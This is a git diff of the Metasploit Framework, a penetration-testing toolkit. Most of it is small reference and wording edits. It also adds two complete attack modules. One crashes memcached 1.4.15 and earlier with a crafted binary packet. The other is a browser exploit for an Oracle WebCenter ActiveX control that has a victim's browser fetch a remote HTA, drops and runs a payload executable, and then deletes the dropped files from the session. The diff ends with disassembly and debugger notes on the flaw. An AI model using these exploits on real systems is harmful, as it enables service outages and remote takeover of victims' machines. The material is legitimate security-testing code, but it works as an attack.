diff --git a/Gemfile b/Gemfile index 7e44826e0a..42853b4bd9 100755 --- a/Gemfile +++ b/Gemfile @@ -15,7 +15,7 @@ group :db do # Needed for Msf::DbManager gem 'activerecord' # Database models shared between framework and Pro. - gem 'metasploit_data_models', '~> 0.15.1' + gem 'metasploit_data_models', '~> 0.15.2' # Needed for module caching in Mdm::ModuleDetails gem 'pg', '>= 0.11' end diff --git a/Gemfile.lock b/Gemfile.lock index 632b53cfde..eab842184d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -23,7 +23,7 @@ GEM i18n (0.6.1) json (1.7.7) metaclass (0.0.1) - metasploit_data_models (0.15.1) + metasploit_data_models (0.15.2) activerecord (>= 3.2.13) activesupport pg @@ -65,7 +65,7 @@ DEPENDENCIES database_cleaner factory_girl (>= 4.1.0) json - metasploit_data_models (~> 0.15.1) + metasploit_data_models (~> 0.15.2) msgpack nokogiri pcaprub diff --git a/modules/auxiliary/dos/misc/memcached.rb b/modules/auxiliary/dos/misc/memcached.rb new file mode 100644 index 0000000000..efaacf64ea --- /dev/null +++ b/modules/auxiliary/dos/misc/memcached.rb @@ -0,0 +1,68 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' + + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Memcached Remote Denial of Service', + 'Description' => %q{ + This module sends a specially-crafted packet to cause a + segmentation fault in memcached v1.4.15 or earlier versions. + }, + 'References' => + [ + [ 'URL', 'https://code.google.com/p/memcached/issues/detail?id=192' ], + [ 'CVE', '2011-4971' ], + [ 'OSVDB', '92867' ] + ], + 'Author' => [ 'Gregory Man ' ], + 'License' => MSF_LICENSE + )) + + register_options([Opt::RPORT(11211),], self.class) + end + + def is_alive? + begin + connect + disconnect + rescue Rex::ConnectionRefused + return false + end + + return true + end + + def run + connect + pkt = "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00" + pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00" + pkt << "\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + print_status("#{rhost}:#{rport} - Sending dos packet...") + sock.put(pkt) + disconnect + + print_status("#{rhost}:#{rport} - Checking host status...") + select(nil, nil, nil, 1) + + if is_alive? + print_error("#{rhost}:#{rport} - The DoS attempt did not work, host is still alive") + else + print_good("#{rhost}:#{rport} - Tango down") # WWJS - What would th3j35t3r say? + end + end +end diff --git a/modules/auxiliary/scanner/couchdb/couchdb_login.rb b/modules/auxiliary/scanner/couchdb/couchdb_login.rb index 4d7ddc0c32..4696dfc8db 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_login.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_login.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'CouchDB Login Utility', 'Description' => %{ - This module will test CouchDB logins on a range of + This module tests CouchDB logins on a range of machines and report successful logins. }, 'Author' => diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index eb5cc779d7..cd751c7b9c 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary print_status("[#{target_host}] NOT Found. #{tpath} #{res.code}") end else - print_status("[#{target_host}] SVN Entries file found.") + print_good("[#{target_host}:#{rport}] SVN Entries file found.") report_web_vuln( :host => target_host, diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index 85f6638095..ddaf1092d7 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + [ 'OSVDB', '85462'], [ 'BID', '55050'], [ 'EDB', '20551' ] ], diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index d793948709..cf011a1edf 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -35,6 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2013-0136' ], + [ 'OSVDB', '93444' ], [ 'US-CERT-VU', '701572' ], [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ] ], diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index 10a211bc13..d40bed2db6 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2012-0297' ], + [ 'OSVDB', '82925' ], [ 'BID', '53444' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ], [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ] diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb index 8ed47f8b1b..2bf0f7e60d 100644 --- a/modules/exploits/linux/http/vcms_upload.rb +++ b/modules/exploits/linux/http/vcms_upload.rb @@ -36,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['CVE', '2011-4828'], + ['OSVDB', '77183'], ['BID', '50706'], ['URL', 'http://bugs.v-cms.org/view.php?id=53'], ['URL', 'http://xforce.iss.net/xforce/xfdb/71358'] diff --git a/modules/exploits/linux/local/kloxo_lxsuexec.rb b/modules/exploits/linux/local/kloxo_lxsuexec.rb index 6605bc7380..4619a132f7 100644 --- a/modules/exploits/linux/local/kloxo_lxsuexec.rb +++ b/modules/exploits/linux/local/kloxo_lxsuexec.rb @@ -46,6 +46,7 @@ class Metasploit4 < Msf::Exploit::Local 'References' => [ [ 'EDB', '25406' ], + [ 'OSVDB', '93287' ], [ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC ], 'Targets' => diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb index 576d6c20a2..1aade0af6a 100644 --- a/modules/exploits/linux/local/sock_sendpage.rb +++ b/modules/exploits/linux/local/sock_sendpage.rb @@ -62,6 +62,7 @@ class Metasploit4 < Msf::Exploit::Local 'References' => [ [ 'CVE', '2009-2692' ], + [ 'OSVDB', '56992' ], [ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ], [ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ], ], diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index 6d9a97bfe2..d17b2ac3f9 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -21,10 +21,10 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.14.2. A specifically crafted request parameter can be used to inject arbitrary OGNL code into the stack bypassing Struts and OGNL library protections. - When targeting an action which requires interaction through GET the payload should - be split having into account the uri limits. In this case, if the rendered jsp has - more than one point of injection, it could result in payload corruption. It should - happen only when the payload is larger than the uri length. + When targeting an action which requires interaction through GET, the payload should + be split, taking into account the URI limits. In this case, if the rendered JSP has + more than one point of injection, it could result in payload corruption. This should + happen only when the payload is larger than the URI length. }, 'Author' => [ diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb new file mode 100644 index 0000000000..8c38681fcd --- /dev/null +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb @@ -0,0 +1,262 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution", + 'Description' => %q{ + This modules exploits a vulnerability found in the Oracle WebCenter Content + CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where + user controlled input is used to call ShellExecuteExW(). This module abuses the + control to execute an arbitrary HTA from a remote location. This module has been + tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle + WebCenter Content 11.1.1.6.0. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-1559' ], + [ 'OSVDB', '92386' ], + [ 'BID', '59122' ], + [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-094/' ] + ], + 'Payload' => + { + 'Space' => 2048, + 'StackAdjustment' => -3500 + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f -k' + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Apr 16 2013", + 'DefaultTarget' => 0)) + end + + def exploit + @var_exename = rand_text_alpha(5 + rand(5)) + ".exe" + @dropped_files = [ + @var_exename + ] + super + end + + def on_new_session(session) + if session.type == "meterpreter" + session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") + end + + @dropped_files.delete_if do |file| + win_file = file.gsub("/", "\\\\") + if session.type == "meterpreter" + begin + wintemp = session.fs.file.expand_path("%TEMP%") + win_file = "#{wintemp}\\#{win_file}" + session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) + session.fs.file.rm(win_file) + print_good("Deleted #{file}") + true + rescue ::Rex::Post::Meterpreter::RequestError + print_error("Failed to delete #{win_file}") + false + end + + end + end + end + + def build_hta(cli) + var_shellobj = rand_text_alpha(rand(5)+5); + var_fsobj = rand_text_alpha(rand(5)+5); + var_fsobj_file = rand_text_alpha(rand(5)+5); + var_vbsname = rand_text_alpha(rand(5)+5); + var_writedir = rand_text_alpha(rand(5)+5); + + var_origLoc = rand_text_alpha(rand(5)+5); + var_byteArray = rand_text_alpha(rand(5)+5); + var_writestream = rand_text_alpha(rand(5)+5); + var_strmConv = rand_text_alpha(rand(5)+5); + + p = regenerate_payload(cli); + exe = generate_payload_exe({ :code => p.encoded }) + + # Doing in this way to bypass the ADODB.Stream restrictions on JS, + # even when executing it as an "HTA" application + # The encoding code has been stolen from ie_unsafe_scripting.rb + print_status("Encoding payload into vbs/javascript/hta..."); + + # Build the content that will end up in the .vbs file + vbs_content = Rex::Text.to_hex(%Q| +Dim #{var_origLoc}, s, #{var_byteArray} +#{var_origLoc} = SetLocale(1033) +|) + # Drop the exe payload into an ansi string (ansi ensured via SetLocale above) + # for conversion with ADODB.Stream + vbs_ary = [] + # The output of this loop needs to be as small as possible since it + # gets repeated for every byte of the executable, ballooning it by a + # factor of about 80k (the current size of the exe template). In its + # current form, it's down to about 4MB on the wire + exe.each_byte do |b| + vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n") + end + vbs_content << vbs_ary.join("") + + # Continue with the rest of the vbs file; + # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent + # Then use ADODB.Stream again to write the binary to file. + #print_status("Finishing vbs..."); + vbs_content << Rex::Text.to_hex(%Q| +Dim #{var_strmConv}, #{var_writedir}, #{var_writestream} + #{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}" + +Set #{var_strmConv} = CreateObject("ADODB.Stream") + +#{var_strmConv}.Type = 2 +#{var_strmConv}.Charset = "x-ansi" +#{var_strmConv}.Open +#{var_strmConv}.WriteText s, 0 +#{var_strmConv}.Position = 0 +#{var_strmConv}.Type = 1 +#{var_strmConv}.SaveToFile #{var_writedir}, 2 + +SetLocale(#{var_origLoc})|) + + hta = <<-EOS + + EOS + + return hta + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + + if agent !~ /MSIE \d/ + print_error("Browser not supported: #{agent.to_s}") + send_not_found(cli) + return + end + + print_status("Request received for #{request.uri}"); + + if request.uri =~ /\.hta$/ + hta = build_hta(cli) + print_status("Sending HTA application") + send_response(cli, hta, {'Content-Type'=>'application/hta'}) + return + end + + uri = "#{get_uri}#{rand_text_alpha(rand(3) + 3)}.hta" + + html = <<-EOS + + + + + + + EOS + + print_status("Sending HTML") + send_response(cli, html, {'Content-Type'=>'text/html'}) + + end + +end + +=begin + +* The vulnerable control tries to solve how to open the provided extension + +.text:100099FC lea eax, [ebp+830h+Src] +.text:10009A02 push eax ; lpResult +.text:10009A03 lea eax, [ebp+830h+Directory] +.text:10009A06 push eax ; lpDirectory +.text:10009A07 lea eax, [ebp+830h+PathName] +.text:10009A0D push eax ; lpFile +.text:10009A0E call ds:FindExecutableW ; This function returns the executable associated with the specified file for the default verb + +* If succeeds, the provided user data is used as argument: + +.text:10009D8F lea eax, [ebp+psz] +.text:10009D95 mov [ebp+pExecInfo.lpFile], eax +.text:10009D9B mov eax, [ebp+var_238] +.text:10009DA1 mov [ebp+pExecInfo.cbSize], 3Ch +.text:10009DAB mov [ebp+pExecInfo.fMask], 2000000h +.text:10009DB5 mov [ebp+pExecInfo.hwnd], ebx +.text:10009DBB mov [ebp+pExecInfo.lpVerb], offset aOpen ; "open" +.text:10009DC5 jnb short loc_10009DCD +.text:10009DC7 lea eax, [ebp+var_238] +.text:10009DCD +.text:10009DCD loc_10009DCD: ; CODE XREF: make_ShellExecute_sub_10009ACC+2F9j +.text:10009DCD mov [ebp+pExecInfo.lpParameters], eax +.text:10009DD3 lea eax, [ebp+pExecInfo] +.text:10009DD9 push eax ; pExecInfo +.text:10009DDA mov [ebp+pExecInfo.lpDirectory], ebx +.text:10009DE0 mov [ebp+pExecInfo.nShow], 0Ah +.text:10009DEA call ds:ShellExecuteExW + +* On the debugger: + +Breakpoint 1 hit +eax=0201ef6c ebx=00000000 ecx=00000000 edx=03850608 esi=00000008 edi=00000000 +eip=10009dea esp=0201ee08 ebp=0201f200 iopl=0 nv up ei pl nz ac po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 +CheckOutAndOpen!DllUnregisterServer+0x7108: +10009dea ff156cd20210 call dword ptr [CheckOutAndOpen!DllUnregisterServer+0x2a58a (1002d26c)] ds:0023:1002d26c={SHELL32!ShellExecuteExW (7ca02f03)} +0:007> dd esp +0201ee08 0201ef6c <== pExecInfo +0:007> dd 0201ef6c +0201ef6c 0000003c 02000000 00000000 10031468 +0201ef7c 0201efe0 03854688 +0:007> du 0201efe0 +0201efe0 "C:\WINDOWS\system32\mshta.exe" +0:007> du 03854688 +03854688 ""http://192.168.172.1:8080/xKRTv" +038546c8 "m0mqpAt7sEYdVq.hta"" + +This code allows to launch other executables with user data provided as argument, but at the moment I like the HTA +solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other +executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so +the target should have the WebClient service enabled, which is only enabled by default on XP SP3. +=end \ No newline at end of file diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb index c8ac95160a..439e2e3708 100644 --- a/modules/exploits/windows/misc/lianja_db_net.rb +++ b/modules/exploits/windows/misc/lianja_db_net.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in the db_netserver process which + This module exploits a stack buffer overflow in the db_netserver process, which is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2. }, 'Author' => 'Spencer McIntyre',